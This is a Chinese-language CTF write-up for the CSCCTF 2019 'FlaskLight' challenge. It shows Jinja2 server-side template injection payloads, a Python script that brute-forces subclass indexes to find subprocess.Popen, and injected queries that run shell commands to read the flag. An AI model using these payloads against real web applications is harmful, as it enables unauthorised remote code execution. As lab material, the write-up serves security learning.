[CSCCTF 2019 Qual]FlaskLight

[CSCCTF 2019 Qual]FlaskLight

打开环境

BlFd9_QyyiU0IJbFW_AtIhKKCTBUKGnmemD3s8BjvK0

源代码里发现可通过GET方式传入参数

Ao_7V3nX3ng7ziq6U59vwpqBWl5R6sJ25TWIdLQ_3PM

简单验证发现存在SSTI

tUcofv_QaZedSKle9LLOgoBSGCYQgmz8niMR98Z_tlw

{{''.__class__.__mro__[2].__subclasses__()}}
#可以爆出所有的类

d6je7lqX7WN_iUgHlKGm_rK0whFFL9TD06qiYqN05D0

编写脚本查找可利用的类

利用subprocess.Popen执行命令

import requests
import re
import html
import time

index = 0
for i in range(170, 1000):
    try:
        url = "http://d508a2e1-0194-4d51-871a-42388d21b1a5.node5.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
        # print(res)
        # print(r.text)
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except:
        continue
print("indexo of subprocess.Popen:" + str(index))

2sJ_wSvsihX0netjwWV7pxj-RCzThyUKJGxi3qhEd20

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}

tokoMoerVV3Ksb0w5PfAMU1oS-MULqywoLLkG6dgd44

posted on 2024-05-03 15:35  跳河离去的鱼  阅读(1)  评论(0编辑  收藏  举报